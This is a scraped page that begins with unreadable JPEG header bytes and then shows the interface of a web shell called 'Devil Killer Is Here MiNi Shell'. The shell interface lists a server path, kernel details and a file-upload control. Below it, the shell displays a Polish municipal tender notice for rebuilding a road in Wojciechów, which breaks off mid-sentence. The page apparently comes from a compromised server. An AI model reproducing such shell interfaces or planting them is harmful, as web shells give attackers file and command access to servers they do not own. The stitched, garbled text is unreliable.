JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211013/0023128301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa odcinka drogi gminnej nr 106916 L w miejscowości Wojciechów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wojciechów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431020180</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojciechów 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wojciechów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(81) 51 77 241</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(81) 51 77 665</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info@wojciechow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wojciechow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa odcinka drogi gminnej nr 106916 L w miejscowości Wojciechów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a57f39d0-2c10-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00231283</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008078/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 „Przebudowa odcinka drogi gminnej nr 106916 L w miejscowości Wojciechów”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzp.wojciechow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem bezpłatnej Platformy Zamówień Publicznych ZETOPZP<br/>dostępnej pod adresem https://pzp.wojciechow.pl.<br/>Szczegółowe informacje na ten temat dostępne są w Rozdziale 11 SWZ. https://pzp.wojciechow.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pośrednictwem<br/>Platformy Zamówień Publicznych ZETOPZP: https://pzp.wojciechow.pl. Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi założyć konto na Platformie<br/>Zamówień Publicznych ZETOPZP: https://pzp.wojciechow.pl/#/authentication/register gdzie zostanie<br/>powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. 2.Wykonawca przystępując<br/>do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując w<br/>przypadku posiadania konta w Platformie Zamówień Publicznych ZETOPZP, akceptuje warunki<br/>korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie internetowej<br/>https://pzp.wojciechow.pl oraz uznaje go za wiążący. 3.Zamawiający, zgodnie z art. 67 Ustawy z dnia<br/>11 września 2019r. – Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019 z późn. zm.) określa<br/>następujące wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej przy wykorzystaniu Platformy tj.: a) stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s; b) komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje; c) zainstalowana<br/>dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z<br/>wyjątkiem Internet Explorer; d)włączona obsługa JavaScript; e)zainstalowany program Acrobat Reader<br/>lub inny obsługujący pliki w formacie pdf.; f)podłączony lub wbudowany do komputera czytnik karty<br/>kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę. 4.a) dopuszczalne<br/>formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: .pdf, .doc, .docx, .xls, xlsx, .zip, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff, .xades, .sig oraz innych formatach plików określonych w<br/>przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (Dz.U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), z<br/>wyjątkiem formatów wykonywalnych (takich jak np. EXE, COM, DLL, BAT). b)informacje na temat<br/>kodowania i czasu odbioru danych: - plik załączony przez Wykonawcę na Platformie Zamówień<br/>Publicznych ZETOPZP i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po<br/>upływie terminu składania ofert. 5.Zasady składania ofert oraz dokumentów składanych wraz z ofertą<br/>oraz wymagania techniczne i organizacyjne ich wysyłania opisane zostały w Instrukcji użytkownika,<br/>Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej<br/>wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę<br/>akceptuje zasady korzystania z Platformy wskazane w Instrukcji użytkownika i SWZ. 6.Sporządzenie i<br/>przekazywanie informacji w tym dokumentów elektronicznych musi być zgodne z wymaganiami<br/>określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie. 7.Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest synchronizowany ze<br/>znacznikiem czasu UTC. Dalsze informacje i wskazówki zawarto w SWZ Rozdział 11.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca<br/>przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego<br/>na zadanie pn.: „Przebudowa odcinka drogi gminnej nr 106916 L w miejscowości Wojciechów” prowadzonym w trybie podstawowym;<br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”;<br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7) Wykonawca posiada: − na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza<br/>integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna,<br/>że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>8) Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia<br/>2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w<br/>drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NR.271.12.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa odcinka drogi gminnej nr 106916L o długości 500 m oraz istniejącego chodnika w miejscowości Wojciechów, polegająca na: <br/>•	Przebudowa drogi gminnej nr 106916L Wojciechów - dr.woj. 827 (dz. nr ewid. 1578 w m. Wojciechów, obręb geodezyjny Wojciechów) o długości 500,00 m od km rob. 0+000 do km rob. 0+500,00. Lokalizacja odcinka drogi do przebudowy w całości znajduje się w pasie drogi gminnej na działce nr ewid. 1578 w m. Wojciechów. Przebudowa odcinka drogi gminnej obejmuje wykonanie: przebudowy jezdni o istniejącej szerokości (5,0 - 4,5 m), odtworzenie poboczy gruntowych, odtworzenie zieleńców, wykonanie przebudowy istniejącego chodnika po prawej stronie od km 0+000 do km 0+267m. Szerokość i przebieg drogi co do zasady pozostaje bez zmian. Istniejąca nawierzchnia drogi podlega przebudowie, w zakresie wyrównania istniejącej nawierzchni bitumicznej w zakresie frezowania korekcyjnego (likwidacja nierówności), oczyszczenia i skropienia emulsją asfaltową istniejącej nawierzchni i ułożenia warstwy ścieralnej o szerokości 5 m na odcinku od km 0+000,00 do km 0+410,00 oraz szerokości 4,5 m na odcinku do 0+410 do 0+500 wg wymiarów i lokalizacji wskazanych w części rysunkowej projektu. Roboty należy wykonać zgodnie z parametrami / wymiarami podanymi w części rysunkowej projektu. Przebieg i promienie łuków poziomych w planie sytuacyjnym pozostają bez zmian. Dla odcinka od km 0+000,00 do km 0+500,00 konstrukcję przebudowy drogi pokazano w przekroju normalnym rys. nr 3. Warstwa ścieralna z betonu asfaltowego AC11S50/70 grubości 5 cm. Krawędzie wykonanej nawierzchni uszczelnić asfaltem, szerokość poboczy gruntowych 0,75 m. Na odcinku od km 0+000 do km 0+267 po stronie prawej należy wykonać: rozbiórkę istniejącej nawierzchni chodnika z kostki bet. brukowej o szerokości 1,3 m oraz na długości chodnika rozbiórkę obrzeży betonowych 20x6x100 cm, wyrównanie istniejącej podbudowy podsypką cementowo piaskową 1:4 i ponowne ułożenie nawierzchni chodnika z nowej kostki betonowej, wykonać nową obwiednię z obrzeży z rozbiórki. Istniejące zjazdy wyregulować wysokościowo do nowo wykonanej nawierzchni asfaltowej. Na odcinku dł. 15 m po stronie prawej w km 0+211 w należy wykonać ściek przykrawężnikowy – obniżone dwa rzędy z kostki betonowej brukowej gr. 6 cm na ławie z betonu. <br/>W ramach przedmiotu zamówienia Wykonawca:<br/>1)	wykona roboty budowlane w zakresie przebudowy odcinka drogi gminnej nr 106916L o długości 500 m oraz istniejącego chodnika w miejscowości Wojciechów,<br/>2)	dostarczy materiały i urządzenia niezbędne do wykonania robót,<br/>3)	będzie uczestniczyć w czynnościach odbiorowych inwestycji,<br/>4)	przygotuje obiekt do eksploatacji – roboty porządkowe<br/>5)	zapewni obsługę geodezyjną inwestycji <br/>6)	przygotuje wymagane dokumenty odbiorowe. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach<br/>poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na wykonane roboty budowlane oraz wbudowane materiały i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu<br/>i zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia.<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych,<br/>strony<br/>dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie<br/>której<br/>dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z następujących<br/>okoliczności:<br/>1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 4 ust. 1, może nastąpić w<br/>przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia<br/>niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu<br/>wejścia w życie<br/>umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę<br/>dni,<br/>odpowiadającą okresowi występowania okoliczności siły wyższej,<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 4 ust. 1, może nastąpić w<br/>przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania<br/>robót<br/>budowlanych, stanowiących przedmiot zamówienia lub wydania zakazu prowadzenia robót<br/>budowlanych, stanowiących przedmiot zamówienia przez organ administracji publicznej lub<br/>eksploatorów infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które<br/>Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia<br/>nastąpi o<br/>liczbę dni, odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót<br/>budowlanych lub<br/>zakazano prowadzenie 